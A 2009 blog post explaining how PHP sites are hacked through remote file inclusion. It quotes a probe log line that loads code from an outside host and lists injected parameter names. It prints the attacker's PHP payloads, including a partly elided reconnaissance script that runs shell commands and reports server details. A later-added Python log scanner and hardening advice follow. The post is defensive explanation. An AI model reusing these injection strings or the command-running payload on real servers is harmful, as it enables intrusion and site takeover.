How websites get hacked.

Perhaps a 'bunch of kiddies', as some bloggers call them, but they are able to get in. Learn how they do it. (July 26, 2009)

Websites get hacked. If you run a website that uses PHP scripts or any other kind of dynamic web page, it is likely that your site has already been hacked or will be.

You may think "It can't happen to me", but sooner or later you will find that someone got into your server and took control of your site. Let's find out how they do it.

First of all, if you check your logs you will be able to find something like this:


Jun 27, 01:40.24,index%20?load=http://somewebsite.etc/bbs/data/text/hackcode.txt???, IP:91.121.83.177, Host:ns352532.ovh.net, Agent:Mozilla/5.0


What happens here? Someone, or something, tried to open the page index%20?load=http://somewebsite.etc/bbs/data/text/hackcode.txt??? - the space (%20) before the question mark tries to "trick" the site, I guess, - and sent the query "load=http://somewebsite.etc/bbs/data/text/hackcode.txt". The question marks after the query are used to "trick" the program into treating what follows them as the "real query".

Basically, someone or something - a running program, of course - is looking for security flaws in your PHP code and is asking it to load the file indicated. The hacker also tries:


  • sel=http://
  • _SERVER[DOCUMENT_ROOT]=http://
  • adresa=http://
  • pagina=http://
  • //manager/admin/u_ins.php?MGR=http://
  • %20%20%A1%B3%C4%D5%E2%F0%1B%24%30%4F%50%65%70%82%9C <- Not the real string.
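As an added example (not from the original post), here is a small Python scanner that reads log lines in the format shown above and flags the remote-file-inclusion probes just described: a URL supplied as a parameter value, the %20 before the "?", and the trailing "???" padding. The sample lines, host names and IP addresses are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote

# Matches the log format shown above: "Mon DD, HH:MM.SS,<request>, IP:<ip>, Host:<host>, Agent:<agent>"
LOG_RE = re.compile(
    r"^(?P<when>[^,]+,[^,]+),(?P<request>.*?), IP:(?P<ip>[^,]+), Host:(?P<host>[^,]+), Agent:(?P<agent>.*)$"
)
# A parameter value that starts with a URL scheme is the signature of a remote file inclusion probe.
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Constructed sample lines in the article's format; the hosts and IPs are placeholders, not real scanners.
SAMPLE_LOG = """\
Jun 27, 01:40.24,index%20?load=http://example.invalid/bbs/data/text/hackcode.txt???, IP:192.0.2.10, Host:scanner.example, Agent:Mozilla/5.0
Jun 27, 01:40.31,index?page=contact, IP:198.51.100.7, Host:visitor.example, Agent:Mozilla/5.0
Jun 27, 01:41.02,manager/admin/u_ins.php?MGR=http://example.invalid/x.txt?, IP:192.0.2.10, Host:scanner.example, Agent:Mozilla/5.0
"""

def probe_reasons(request):
    """Return why a single request string looks like an RFI probe ([] if it looks clean)."""
    reasons = []
    path, sep, query = request.partition("?")
    # "index%20?": encoded whitespace squeezed between the script name and the query string.
    if sep and unquote(path) != unquote(path).rstrip():
        reasons.append("whitespace before '?' (the %20 trick)")
    # parse_qsl decodes each name=value pair; keep_blank_values keeps bare names such as "%20%20%A1..."
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            reasons.append(f"remote URL supplied in parameter {name!r}")
    # The "???" padding appended after the injected URL.
    if query.endswith("?"):
        reasons.append("trailing '?' padding after the injected value")
    return reasons

def scan_log(text):
    """Parse every line and return the entries that look like RFI probes, with the source IP and host."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production tool should count these rather than drop them silently
        reasons = probe_reasons(m.group("request"))
        if reasons:
            hits.append({"ip": m.group("ip"), "host": m.group("host"),
                         "request": m.group("request"), "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["request"], "->", "; ".join(hit["reasons"]))
```

Pointing scan_log at a real log in this format gives the list of probing IPs to review, and an empty list for ordinary traffic such as the "page=contact" line.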

Now, looking at the file that the hacker is trying to run, we find that it is PHP code. Here is the code:
    <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
    
Well, it doesn't look like much of a hack; it just displays:

FeeLCoMzFeeLCoMz

This simple code is just an acknowledgement that your website has a security flaw and is able to execute PHP code. Once their software gets the string "FeeLCoMzFeeLCoMz", it sends another link to execute a more complex piece of code. Here is the code:


    <?php
    ##[ Fx29ID ]##
    fx("ID","FeeL"."CoMz");
    $P   = @getcwd();
    $IP  = @getenv("SERVER_ADDR");
    $UID = fx29exec("id");
    fx("SAFE",@safemode()?"ON":"OFF");
    fx("OS",@PHP_OS);
    fx("UNAME",@php_uname());
    fx("SERVER",($IP)?$IP:"-");
    fx("USER",@get_current_user());
    fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
    fx("DIR",$P);
    fx("PERM",(@is_writable($P))?"[W]":"[R]");
    fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
    fx("DISFUNC",@getdisfunc());
    ##[ FX29SHEXEC ]##
    function fx($t,$c) {
       echo "$t: "; echo (is_array($c))?join(" ",$c):$c;
       echo "<br>";
    }
    function safemode() {
       // Check the value of safe_mode
    }
    function getdisfunc() {
       $rez = explode(",",@ini_get("disable_functions"));
       return (!empty($rez))?$rez:array();
    }
    function enabled($func) {
       return (function_exists($func) && is_callable($func)
       && !in_array($func,getdisfunc())) ? TRUE : FALSE;
    }
    function fx29exec($cmd) {
      if (enabled("exec")) {
         exec($cmd,$o); $rez = join("\r\n",$o);
      }
      elseif (enabled("shell_exec")) {
         $rez = shell_exec($cmd);
      }
      elseif (enabled("system")) {
         @ob_start(); @system($cmd); $rez = @ob_get_contents();
         @ob_end_clean();
      }
      elseif (enabled("passthru")) {
        @ob_start(); passthru($cmd); $rez = @ob_get_contents();
        @ob_end_clean();
      }
      elseif ( // other junk to read and display the
                  system information
      } else { $rez = "Error!"; }
      return $rez;
    }
    function vsize($size) {
      if (!is_numeric($size)) { return FALSE; }
      else {
        // Calculates the size in GB, MB, KB and Bytes
      }
    }
    function hdd($type) {
      $P = @getcwd(); $T = @disk_total_space($P);
      $F = @disk_free_space($P); $U = $T - $U;
      // Returns the Total disk space, available and used.
    }
    die("FeeLCoMz");
    ?>
    
Now it is more like a real hack. Whoever sees this information is able to get lots of data about your system. Once they have collected this info, they can get into your site whenever they want.

You may wonder: who are they? How do they get this information? What is their IP?

Well, they can be anyone, and their IP can't be determined because they are using "zombies", that is, third-party computers. They can put another program on ANY server and run the software to hack another website. They do it using Perl. The code is even available online but, of course, as a website owner, I will not post it here.

My advice to website owners:


  • Check your site often, pay attention to your logs.
  • Check the date when your HTML and PHP files were modified.
  • Do not use FTP to access your website as it doesn't encrypt passwords.
  • Do not execute commands or open files using values taken directly from the query string.
  • If you are using a third-party blog or script on your website - for example a guest book, photo uploader or forum - update it frequently.

Also, be aware that this is not the only hack available to get into your website.


© 2006-2010 Jose Pino